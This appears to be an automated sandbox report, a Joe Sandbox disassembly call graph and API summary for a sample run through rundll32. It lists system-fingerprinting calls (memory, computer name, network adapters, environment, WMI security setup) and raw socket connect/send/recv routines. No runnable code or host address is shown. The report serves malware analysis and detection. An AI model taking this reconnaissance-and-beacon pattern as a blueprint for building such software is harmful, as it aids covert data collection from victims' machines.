46314->45843 46315->45843 46316->45843 46317->45843 46318->45843 46319->45843 46320->45843 46321->45843 46322->45843 46323->45843 46324->45843 46325->45843 46326->45843 46327->45843 46328->45843 46329->45837 46330->45839 46331->45841 46333 7f2ef62b _memcpy_s 46332->46333 46333->45877 46335 7f295377 numpunct 46334->46335 46337 7f295381 numpunct 46335->46337 46385 7f2c23f0 15 API calls numpunct 46335->46385 46338 7f29539a ctype 46337->46338 46386 7f2949f0 14 API calls 2 library calls 46337->46386 46338->45881 46387 7f295980 46340->46387 46344 7f2a7e9b 46343->46344 46345 7f295360 numpunct 26 API calls 46344->46345 46346 7f2a7f96 46345->46346 46346->46346 46347 7f295360 numpunct 26 API calls 46346->46347 46348 7f2a800f 46347->46348 46349 7f295360 numpunct 26 API calls 46348->46349 46350 7f2a80af 46349->46350 46351 7f2a7700 26 API calls 46350->46351 46352 7f2a80e7 46351->46352 46440 7f2a9e80 46352->46440 46355 7f2a9e80 26 API calls 46356 7f2a811e 46355->46356 46357 7f2a9e80 26 API calls 46356->46357 46358 7f2a812d 46357->46358 46359 7f2a9e80 26 API calls 46358->46359 46363 7f2a813c Concurrency::cancellation_token_source::~cancellation_token_source 46359->46363 46360 7f2a823c 46362 7f2c20f0 std::ios_base::clear 11 API calls 46360->46362 46361 7f2a63a0 std::ios_base::clear 26 API calls 46361->46363 46364 7f2a8248 46362->46364 46363->46360 46363->46361 46369 7f2c20f0 std::ios_base::clear 11 API calls 46363->46369 46444 7f296010 46363->46444 46365 7f2c20f0 std::ios_base::clear 11 API calls 46364->46365 46367 7f2a8254 46365->46367 46368 7f2c20f0 std::ios_base::clear 11 API calls 46367->46368 46370 7f2a8260 46368->46370 46369->46363 46371 7f2c20f0 std::ios_base::clear 11 API calls 46370->46371 46372 7f2a826c 46371->46372 46373 7f2c1d30 11 API calls 46372->46373 46374 7f2a827b 46373->46374 46375 7f2c1d30 46374->46375 46380 7f2c1d7e 46375->46380 46376 7f2c1da4 46377 7f2c1dda std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46376->46377 46470 7f2be850 11 API calls 
Concurrency::cancellation_token_source::~cancellation_token_source 46376->46470 46377->45907 46380->46376 46469 7f2990d0 11 API calls 3 library calls 46380->46469 46382 7f2c211d 46381->46382 46384 7f2c2184 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46382->46384 46471 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46382->46471 46384->45909 46385->46337 46386->46338 46394 7f294ae0 46387->46394 46395 7f294b06 46394->46395 46396 7f294b0b 46394->46396 46405 7f294f20 46395->46405 46398 7f294b77 46396->46398 46414 7f2c2df0 46396->46414 46397 7f294c95 46423 7f2a8c30 46397->46423 46398->46397 46401 7f2c2df0 14 API calls 46398->46401 46404 7f2a63a0 std::ios_base::clear 26 API calls 46398->46404 46401->46398 46403 7f2a63a0 std::ios_base::clear 26 API calls 46403->46398 46404->46398 46406 7f2c2df0 14 API calls 46405->46406 46407 7f294f6e 46406->46407 46408 7f2a8c30 11 API calls 46407->46408 46409 7f29510e 46408->46409 46410 7f2a8e60 46409->46410 46411 7f295a06 46410->46411 46412 7f2a8e77 46410->46412 46411->45883 46412->46411 46439 7f2990d0 11 API calls 3 library calls 46412->46439 46415 7f2c2e0d 46414->46415 46416 7f2c2e12 46414->46416 46427 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46415->46427 46418 7f2c2e24 46416->46418 46419 7f2c2e35 46416->46419 46428 7f294a70 14 API calls 3 library calls 46418->46428 46420 7f294b45 46419->46420 46429 7f2f07db 46419->46429 46420->46403 46424 7f2a8c57 46423->46424 46425 7f2a8c96 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46423->46425 46424->46425 46438 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46424->46438 46425->46395 46427->46416 46428->46420 46432 7f2f07e0 _Yarn 46429->46432 46430 7f2f07fa 46430->46420 46432->46430 46433 7f2f07fc Concurrency::cancel_current_task 46432->46433 46436 7f300396 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 46432->46436 46437 7f2f1ac5 RaiseException 46433->46437 46435 7f2f1401 
46436->46432 46437->46435 46438->46425 46439->46412 46441 7f2a9e9c 46440->46441 46443 7f2a8112 46440->46443 46452 7f2c3290 46441->46452 46443->46355 46445 7f29604a 46444->46445 46446 7f296080 46445->46446 46468 7f2efba8 15 API calls 2 library calls 46445->46468 46457 7f293710 46446->46457 46449 7f2960ae 46462 7f2a8e00 46449->46462 46453 7f2c32a4 std::ios_base::clear 46452->46453 46454 7f2c32e0 46452->46454 46453->46443 46456 7f299980 26 API calls 4 library calls 46454->46456 46456->46453 46458 7f2c2df0 14 API calls 46457->46458 46459 7f29375d 46458->46459 46460 7f2a63a0 std::ios_base::clear 26 API calls 46459->46460 46461 7f29379b 46460->46461 46461->46449 46463 7f2a8e34 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46462->46463 46464 7f2a8e12 46462->46464 46466 7f2a8c30 11 API calls 46463->46466 46465 7f2c20f0 std::ios_base::clear 11 API calls 46464->46465 46465->46463 46467 7f2960d2 46466->46467 46467->46363 46469->46380 46470->46377 46471->46384 46479 7f294cc0 46472->46479 46475 7f294f20 14 API calls 46476 7f295a97 46475->46476 46477 7f2a8e60 11 API calls 46476->46477 46478 7f295aa6 46477->46478 46478->45921 46481 7f294ce9 46479->46481 46480 7f294d07 46480->46475 46481->46480 46482 7f2c2df0 14 API calls 46481->46482 46483 7f294d84 46481->46483 46484 7f294d46 46482->46484 46486 7f294efa 46483->46486 46487 7f2c2df0 14 API calls 46483->46487 46489 7f2a63a0 std::ios_base::clear 26 API calls 46483->46489 46485 7f2a63a0 std::ios_base::clear 26 API calls 46484->46485 46485->46483 46488 7f2a8c30 11 API calls 46486->46488 46487->46483 46488->46480 46489->46483 46491 7f2c2df0 14 API calls 46490->46491 46492 7f2a860e 46491->46492 46492->45925 46495 7f2de3c3 46493->46495 46494 7f2de3f2 GetPEB 46496 7f2de431 46494->46496 46495->46494 46654 7f2a1f00 46496->46654 46499 7f2de5be 46501 7f2c3290 26 API calls 46499->46501 46500 7f2de623 46502 7f2c3290 26 API calls 46500->46502 46503 7f2a862a 46501->46503 46502->46503 46504 7f2d9a90 GetPEB 46503->46504 46505 7f2d9adf 46504->46505 46506 
7f2d9c50 46505->46506 46507 7f2d9ca9 46505->46507 46506->46506 46509 7f2c3290 26 API calls 46506->46509 46507->46507 46508 7f2c3290 26 API calls 46507->46508 46510 7f2a8632 46508->46510 46509->46510 46511 7f2dd3e0 GetPEB 46510->46511 46512 7f2dd546 46511->46512 46513 7f2dd99d GetPEB 46512->46513 46514 7f2dd77e GetPEB 46512->46514 46515 7f2dda0b 46513->46515 46519 7f2dd7b4 46514->46519 46516 7f2ddc24 GetPEB 46515->46516 46515->46519 46516->46519 46517 7f2dde34 GetPEB 46520 7f2dde73 46517->46520 46519->46517 46519->46520 46521 7f2de06f 46520->46521 46659 7f2f1ac5 RaiseException 46520->46659 46522 7f2c3290 26 API calls 46521->46522 46524 7f2de103 46522->46524 46523 7f2a863a 46526 7f2dc170 46523->46526 46524->46523 46524->46524 46525 7f2c3290 26 API calls 46524->46525 46525->46523 46660 7f2a2050 46526->46660 46530 7f2dc1d2 46531 7f2dc349 46530->46531 46532 7f2dc3a8 46530->46532 46535 7f2c3290 26 API calls 46531->46535 46664 7f2ee9e0 36 API calls 2 library calls 46532->46664 46534 7f2dc3b9 46537 7f2c3290 26 API calls 46534->46537 46536 7f2a8642 46535->46536 46538 7f2d9d20 46536->46538 46537->46536 46666 7f2df830 46538->46666 46541 7f2d9d42 46542 7f2c3290 26 API calls 46541->46542 46552 7f2a864a 46542->46552 46543 7f2d9daf 46544 7f2da12b 46543->46544 46545 7f2d9f4b 46543->46545 46546 7f2da169 46544->46546 46547 7f2da1d1 46544->46547 46569 7f2da1cc 46544->46569 46690 7f2a1f30 GetPEB 46545->46690 46549 7f2c3290 26 API calls 46546->46549 46686 7f2a1d20 46547->46686 46549->46569 46570 7f2da560 46552->46570 46553 7f2da0be 46555 7f2c3290 26 API calls 46553->46555 46555->46552 46557 7f2da2f3 46692 7f2c2420 46557->46692 46561 7f2da327 46701 7f2ee9e0 36 API calls 2 library calls 46561->46701 46563 7f2da33a 46564 7f2c3290 26 API calls 46563->46564 46565 7f2da39e 46564->46565 46702 7f2c2a20 GetPEB GetPEB 46565->46702 46567 7f2da3a7 46703 7f2a1fc0 GetPEB 46567->46703 46704 7f2a1f30 GetPEB 46569->46704 46572 7f2da583 46570->46572 46571 7f2da5b2 GetPEB 46573 7f2da5fe 46571->46573 
46572->46571 46574 7f2c3290 26 API calls 46573->46574 46575 7f2da830 46573->46575 46574->46575 46576 7f2da84e GetPEB 46575->46576 46577 7f2da8a5 46576->46577 46578 7f2daa75 GetPEB 46577->46578 46579 7f2daaa9 46577->46579 46578->46579 46580 7f2c3290 26 API calls 46579->46580 46581 7f2dad02 46580->46581 46582 7f2a8652 46581->46582 46583 7f2c3290 26 API calls 46581->46583 46584 7f2dadb0 GetPEB 46582->46584 46583->46582 46586 7f2daded GetSystemInfo 46584->46586 46586->45940 46589 7f2daf83 46587->46589 46588 7f2dafb2 GetPEB 46590 7f2daff1 46588->46590 46589->46588 46591 7f2a1f00 GetPEB 46590->46591 46592 7f2db174 46591->46592 46593 7f2db17e 46592->46593 46594 7f2db1e6 46592->46594 46595 7f2c3290 26 API calls 46593->46595 46596 7f2c3290 26 API calls 46594->46596 46597 7f2a8662 46595->46597 46596->46597 46598 7f2de1c0 GetPEB 46597->46598 46601 7f2de207 GlobalMemoryStatusEx 46598->46601 46600 7f2de37e __aulldiv 46600->45944 46601->46600 46604 7f2de6f0 GetComputerNameExA 46602->46604 46605 7f2de86a 46604->46605 46606 7f2de8d5 46604->46606 46609 7f2c3290 26 API calls 46605->46609 46607 7f2a1f00 GetPEB 46606->46607 46608 7f2de8e5 46607->46608 46611 7f2de8ef 46608->46611 46612 7f2de957 46608->46612 46610 7f2a8672 46609->46610 46615 7f2db260 46610->46615 46613 7f2c3290 26 API calls 46611->46613 46614 7f2c3290 26 API calls 46612->46614 46613->46610 46614->46610 46730 7f2f0cc0 46615->46730 46619 7f2db85e 46622 7f2db886 GetPEB 46619->46622 46620 7f2db4d0 46623 7f2db4ee GetPEB 46620->46623 46621 7f2db2e1 GetAdaptersInfo 46621->46619 46621->46620 46624 7f2db8ed 46622->46624 46625 7f2db5d7 46623->46625 46627 7f2dbafa GetPEB 46624->46627 46625->46625 46626 7f2c3290 26 API calls 46625->46626 46628 7f2a867a 46626->46628 46629 7f2dbb60 46627->46629 46647 7f2dc430 46628->46647 46630 7f2dbd94 GetPEB 46629->46630 46631 7f2dbdfb 46630->46631 46732 7f2a1e70 GetPEB 46631->46732 46633 7f2dbff7 46733 7f2a1c30 GetPEB 46633->46733 46635 7f2dc031 46734 7f2a1c30 GetPEB 46635->46734 46637 7f2dc04d 
46735 7f2a1c30 GetPEB 46637->46735 46639 7f2dc087 46736 7f2a1c30 GetPEB 46639->46736 46641 7f2dc0a3 46737 7f2a1c30 GetPEB 46641->46737 46643 7f2dc0dd 46738 7f2ee9e0 36 API calls 2 library calls 46643->46738 46645 7f2dc0f3 46646 7f2c3290 26 API calls 46645->46646 46646->46628 46648 7f2a67d0 numpunct 26 API calls 46647->46648 46649 7f2dc45b 46648->46649 46650 7f296010 26 API calls 46649->46650 46651 7f2dc47f 46650->46651 46652 7f2c20f0 std::ios_base::clear 11 API calls 46651->46652 46653 7f2a8682 46652->46653 46653->45951 46655 7f2a1f0c 46654->46655 46656 7f2a1f1e 46654->46656 46658 7f2ded70 GetPEB 46655->46658 46656->46499 46656->46500 46658->46656 46659->46521 46661 7f2a205c 46660->46661 46662 7f2a206e GetPEB 46660->46662 46665 7f2ded70 GetPEB 46661->46665 46662->46530 46664->46534 46665->46662 46667 7f2df84f 46666->46667 46705 7f2a1d50 46667->46705 46672 7f2dfb20 46713 7f2a1f60 46672->46713 46675 7f2dfbd7 46721 7f2a1f30 GetPEB 46675->46721 46677 7f2dfd32 46679 7f2dffdc 46677->46679 46682 7f2dfe9b 46677->46682 46678 7f2d9d33 46678->46541 46678->46543 46717 7f2a1cc0 46679->46717 46722 7f2a1f30 GetPEB 46682->46722 46684 7f2e0154 46723 7f2a1f30 GetPEB 46684->46723 46687 7f2a1d2c 46686->46687 46688 7f2a1d3e 46686->46688 46728 7f2ded70 GetPEB 46687->46728 46691 7f2a1ea0 GetPEB 46688->46691 46690->46553 46691->46557 46694 7f2c243d 46692->46694 46693 7f2c249c GetPEB 46695 7f2c2513 GetPEB 46693->46695 46694->46693 46697 7f2c2809 46695->46697 46729 7f2de1b0 GetPEB 46697->46729 46699 7f2c29c5 46700 7f2a1db0 GetPEB 46699->46700 46700->46561 46701->46563 46702->46567 46703->46569 46704->46552 46706 7f2a1d5c 46705->46706 46707 7f2a1d6e 46705->46707 46724 7f2ded70 GetPEB 46706->46724 46707->46678 46709 7f2a1f90 46707->46709 46710 7f2a1f9c 46709->46710 46711 7f2a1fae CoInitializeSecurity 46709->46711 46725 7f2ded70 GetPEB 46710->46725 46711->46672 46714 7f2a1f6c 46713->46714 46716 7f2a1f7e 46713->46716 46726 7f2ded70 GetPEB 46714->46726 46716->46675 46716->46677 46718 7f2a1ccc 
46717->46718 46719 7f2a1cde CoSetProxyBlanket 46717->46719 46727 7f2ded70 GetPEB 46718->46727 46719->46678 46719->46684 46721->46678 46722->46678 46723->46678 46724->46707 46725->46711 46726->46716 46727->46719 46728->46688 46729->46699 46731 7f2db26d GetPEB 46730->46731 46731->46621 46732->46633 46733->46635 46734->46637 46735->46639 46736->46641 46737->46643 46738->46645 46740 7f2954a7 numpunct 46739->46740 46742 7f2954b1 std::ios_base::clear 46740->46742 46745 7f2c23f0 15 API calls numpunct 46740->46745 46744 7f2954ca ctype 46742->46744 46746 7f2949f0 14 API calls 2 library calls 46742->46746 46744->45958 46745->46742 46746->46744 46841 7f2a5560 46747->46841 46750 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46751 7f2931af 46750->46751 46751->45962 46755 7f2a5fbc 46752->46755 46754 7f2a6061 46756 7f2a6069 46754->46756 46757 7f2a60e1 46754->46757 46760 7f2a5fe0 46755->46760 46872 7f2ad010 26 API calls 46755->46872 46875 7f2a8760 56 API calls 3 library calls 46756->46875 46877 7f29bed0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46757->46877 46760->46754 46762 7f2a67d0 numpunct 26 API calls 46760->46762 46761 7f2a60d9 46764 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46761->46764 46763 7f2a601c 46762->46763 46873 7f2c58b0 26 API calls 2 library calls 46763->46873 46767 7f2a611d 46764->46767 46767->45966 46768 7f2a6079 46768->46761 46876 7f2ab180 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46768->46876 46769 7f2a603b 46874 7f2f1ac5 RaiseException 46769->46874 46771 7f2a604f 46772 7f2c20f0 std::ios_base::clear 11 API calls 46771->46772 46772->46754 46878 7f2a5590 46773->46878 46776 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46777 7f29320f 46776->46777 46777->45970 46779 7f299635 46778->46779 46893 7f2937c0 46779->46893 46782 7f293b50 46897 7f2a54d0 46782->46897 
46785 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46786 7f293b9f 46785->46786 46786->46032 46910 7f2a55d0 46787->46910 46790 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46791 7f29326f 46790->46791 46791->46058 46793 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46792->46793 46794 7f2a5d6c 46793->46794 46795 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46794->46795 46796 7f2a5d91 46795->46796 46797 7f2c3200 46796->46797 46798 7f2c322c 46797->46798 46799 7f2c320f 46797->46799 46802 7f2c3254 46798->46802 46967 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46798->46967 46799->46798 46966 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46799->46966 46804 7f2c327c 46802->46804 46968 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46802->46968 46805 7f2c7680 46804->46805 46806 7f2c76b5 std::exception::exception 46805->46806 46807 7f2c789d 46806->46807 46808 7f2c76bf 46806->46808 46840 7f2c786f Concurrency::cancellation_token_source::~cancellation_token_source 46807->46840 46971 7f2e7c30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46807->46971 46969 7f2e7c30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46808->46969 46811 7f2c7d2b 46813 7f2c7d37 46811->46813 46814 7f2c7d50 46811->46814 46812 7f2c76f6 Concurrency::cancellation_token_source::~cancellation_token_source 46970 7f299830 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46812->46970 46816 7f2c7d41 46813->46816 46817 7f2c7de2 46813->46817 46978 7f2a8f90 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46814->46978 46815 7f2a5d30 
Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46815->46840 46823 7f2c20f0 std::ios_base::clear 11 API calls 46816->46823 46831 7f2c7d4b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46816->46831 46819 7f2c1ff0 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46817->46819 46824 7f2c7df8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46819->46824 46821 7f2c7d66 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46821->46831 46979 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46821->46979 46825 7f2c7e8a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46823->46825 46824->46831 46980 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46824->46980 46825->46831 46981 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46825->46981 46826 7f2c78e8 Concurrency::cancellation_token_source::~cancellation_token_source 46826->46840 46972 7f296b30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46826->46972 46827 7f2c1ff0 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46830 7f2c7f09 46827->46830 46830->46072 46831->46827 46834 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46834->46840 46836 7f2c7680 Concurrency::cancellation_token_source::~cancellation_token_source 56 API calls 46836->46840 46840->46811 46840->46815 46840->46834 46840->46836 46973 7f2e4160 56 API calls 2 library calls 46840->46973 46974 7f299830 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46974 46975 7f2c4e80 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46975 46976 7f296b30 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46976 46977 7f2c4dd0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46840->46977 46846 
7f29b820 46841->46846 46844 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46845 7f2931a4 46844->46845 46845->46750 46855 7f2c2c30 46846->46855 46849 7f2a67d0 numpunct 26 API calls 46850 7f29b8a6 46849->46850 46851 7f29b8cf 46850->46851 46868 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46850->46868 46864 7f2a9600 46851->46864 46854 7f29b90a 46854->46844 46856 7f2c2c4f 46855->46856 46857 7f2c2c4a 46855->46857 46859 7f2c2c5f 46856->46859 46860 7f2c2c70 46856->46860 46869 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46857->46869 46870 7f294a70 14 API calls 3 library calls 46859->46870 46862 7f29b84c 46860->46862 46863 7f2f07db std::_Facet_Register 3 API calls 46860->46863 46862->46849 46863->46862 46865 7f2a9627 46864->46865 46867 7f2a966c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46864->46867 46865->46867 46871 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46865->46871 46867->46854 46868->46851 46869->46856 46870->46862 46871->46867 46872->46755 46873->46769 46874->46771 46875->46768 46876->46768 46877->46761 46883 7f29b920 46878->46883 46881 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46882 7f293204 46881->46882 46882->46776 46884 7f2c2c30 14 API calls 46883->46884 46885 7f29b94c 46884->46885 46886 7f2a63a0 std::ios_base::clear 26 API calls 46885->46886 46887 7f29b9a4 46886->46887 46890 7f29b9cd 46887->46890 46892 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46887->46892 46889 7f2a9600 11 API calls 46891 7f29ba08 46889->46891 46890->46889 46891->46881 46892->46890 46894 7f293860 46893->46894 46895 7f29382f 46893->46895 46896 7f295360 numpunct 26 API calls 46894->46896 46895->46782 46896->46895 46902 7f29ba20 46897->46902 46900 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46901 
7f293b94 46900->46901 46901->46785 46903 7f2c2c30 14 API calls 46902->46903 46904 7f29ba37 std::ios_base::clear 46903->46904 46907 7f29bab1 46904->46907 46909 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46904->46909 46906 7f2a9600 11 API calls 46908 7f29bae5 46906->46908 46907->46906 46908->46900 46909->46907 46913 7f29b6b0 46910->46913 46918 7f29bff0 46913->46918 46916 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 46917 7f293264 46916->46917 46917->46790 46927 7f2c2d10 46918->46927 46922 7f29c08c 46925 7f29c0b5 46922->46925 46944 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46922->46944 46940 7f2a9740 46925->46940 46926 7f29b6ff 46926->46916 46928 7f2c2d2f 46927->46928 46929 7f2c2d2a 46927->46929 46931 7f2c2d3f 46928->46931 46932 7f2c2d50 46928->46932 46945 7f2c1a70 RaiseException CallUnexpected Concurrency::cancel_current_task 46929->46945 46946 7f294a70 14 API calls 3 library calls 46931->46946 46934 7f2f07db std::_Facet_Register 3 API calls 46932->46934 46935 7f29c01c 46932->46935 46934->46935 46936 7f2939c0 46935->46936 46937 7f293a25 46936->46937 46947 7f2958c0 46937->46947 46941 7f2a9767 46940->46941 46942 7f2a97ac std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46940->46942 46941->46942 46965 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46941->46965 46942->46926 46944->46925 46945->46928 46946->46935 46948 7f2958fd 46947->46948 46949 7f293a51 46947->46949 46955 7f2be980 26 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46948->46955 46949->46922 46951 7f295909 46956 7f29acd0 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46951->46956 46953 7f29593d 46953->46949 46957 7f2c1ff0 46953->46957 46955->46951 46956->46953 46958 7f2c2044 46957->46958 46962 7f2c20a0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 46957->46962 46963 7f295fb0 56 API 
calls 2 library calls 46958->46963 46960 7f2c2059 46960->46962 46964 7f2be850 11 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46960->46964 46962->46949 46963->46960 46964->46962 46965->46942 46966->46798 46967->46802 46968->46804 46969->46812 46970->46840 46971->46826 46972->46826 46973->46840 46974->46840 46975->46840 46976->46840 46977->46840 46978->46821 46979->46831 46980->46831 46981->46831 47295 7f2a71d0 46982->47295 46989 7f2d6070 46990 7f2a71d0 55 API calls 46989->46990 46991 7f2d6098 46990->46991 47310 7f2eb1c0 46991->47310 46994 7f2a72d0 26 API calls 46995 7f2d60cf 46994->46995 46996 7f2aa1a0 46995->46996 46997 7f2aa1ca 46996->46997 46998 7f2aa210 46996->46998 46999 7f2a67d0 numpunct 26 API calls 46997->46999 47003 7f2aa22c 46998->47003 47317 7f2ff35d 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46998->47317 47000 7f2aa1d7 46999->47000 47315 7f2c51c0 26 API calls 2 library calls 47000->47315 47003->46086 47003->46087 47004 7f2aa1f0 47316 7f2f1ac5 RaiseException 47004->47316 47006 7f2aa201 47007 7f2c20f0 std::ios_base::clear 11 API calls 47006->47007 47007->46998 47009 7f2945f9 47008->47009 47010 7f29463e 47009->47010 47318 7f2a8760 56 API calls 3 library calls 47009->47318 47013 7f2946b5 47010->47013 47014 7f294664 47010->47014 47012 7f294627 47015 7f2c3200 Concurrency::cancellation_token_source::~cancellation_token_source 55 API calls 47012->47015 47019 7f2a67d0 numpunct 26 API calls 47013->47019 47016 7f2a67d0 numpunct 26 API calls 47014->47016 47015->47010 47017 7f294670 47016->47017 47319 7f29a920 56 API calls 47017->47319 47021 7f2946c9 47019->47021 47020 7f294696 47022 7f2c20f0 std::ios_base::clear 11 API calls 47020->47022 47320 7f294850 26 API calls std::ios_base::clear 47021->47320 47025 7f2946ad 47022->47025 47024 7f2946eb 47321 7f2c58b0 26 API calls 2 library calls 47024->47321 47025->46107 47027 7f294710 47322 7f2f1ac5 RaiseException 47027->47322 47029 7f294724 47030 7f2c20f0 
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Navigation to non-$-$MNo name attribute $TMP$TMP$The server or prox
                                                • API String ID: 0-3937262799
                                                • Opcode ID: 171105174514c2b52ab88f5799efa9c5281d44ad5335083fbcc79c13ea6687d4
                                                • Instruction ID: b56fe185457e9e9b66703869efb532490b66dad82c779f229e86eccacab81925
                                                • Opcode Fuzzy Hash: 171105174514c2b52ab88f5799efa9c5281d44ad5335083fbcc79c13ea6687d4
                                                • Instruction Fuzzy Hash: 2FE24579D04229CBDB25CF69C894BEDBBB5BF48310F6881DED409A7285DB346A80CF50
                                                APIs
                                                • IsCharLowerA.USER32(00000073), ref: 7F2B9A60
                                                • GetTempPathW.KERNEL32(00000104,?,?), ref: 7F2BA0C7
                                                • GetEnvironmentVariableW.KERNEL32(PATH,00000000,00000000,00000000,00000000,B8A6976E,00000000), ref: 7F2BA36C
                                                  • Part of subcall function 7F2C7680: std::exception::exception.LIBCMTD ref: 7F2C76B0
                                                • Sleep.KERNEL32(?), ref: 7F2BD30E
                                                • API ID: CharEnvironmentLowerPathSleepTempVariablestd::exception::exception
                                                • String ID: 9mD$MNo name attribute $PATH$u${$~
                                                • API String ID: 1510289414-1868743812
                                                • API ID:
                                                • String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
                                                • API String ID: 0-301690894
                                                APIs
                                                  • Part of subcall function 7F293DB0: std::ios_base::clear.LIBCPMTD ref: 7F29421A
                                                • socket.WS2_32(?,?,?), ref: 7F2E52C3
                                                • gethostbyname.WS2_32(?), ref: 7F2E565F
                                                • connect.WS2_32(?,?,?), ref: 7F2E6255
                                                • send.WS2_32(?,?,?,?), ref: 7F2E6649
                                                • recv.WS2_32(?,?,?,?), ref: 7F2E6AA2
                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7F2E799B
                                                • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                                                • String ID: -P
                                                • API String ID: 3660264722-3391753047
                                                • API ID:
                                                • String ID: Navigation to non-$TMP$TMP
                                                • API String ID: 0-443054689
                                                • API ID:
                                                • String ID: TMP$TMP
                                                • API String ID: 0-2876906010
                                                APIs
                                                • GetTempFileNameW.KERNEL32(7F318204,TMP,00000000,?,?,?,05BFEAE5,00059755,FFFFFE9B,FFFFFFFF,?,?), ref: 7F2ED8FE
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 7F2EDA1A
                                                • lstrlenW.KERNEL32(?), ref: 7F2EE5FE
                                                • API ID: CurrentDirectoryFileNameTemplstrlen
                                                • String ID: TMP$TMP
                                                • API String ID: 1953906443-2876906010
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7F2DFA5A
                                                • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7F2E0140
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BlanketInitializeProxySecurity
                                                • String ID: w$}
                                                • API String ID: 257369873-1906527200

                                                Control-flow Graph

                                                • First block: 7f2de1c0-7f2de204
                                                • Named calls: GetPEB, GlobalMemoryStatusEx
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv$GlobalMemoryStatus
                                                • String ID: @
                                                • API String ID: 2185283323-2766056989

                                                Control-flow Graph

                                                • First block: 7f2d9d20-7f2d9d40
                                                • Named calls: none
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
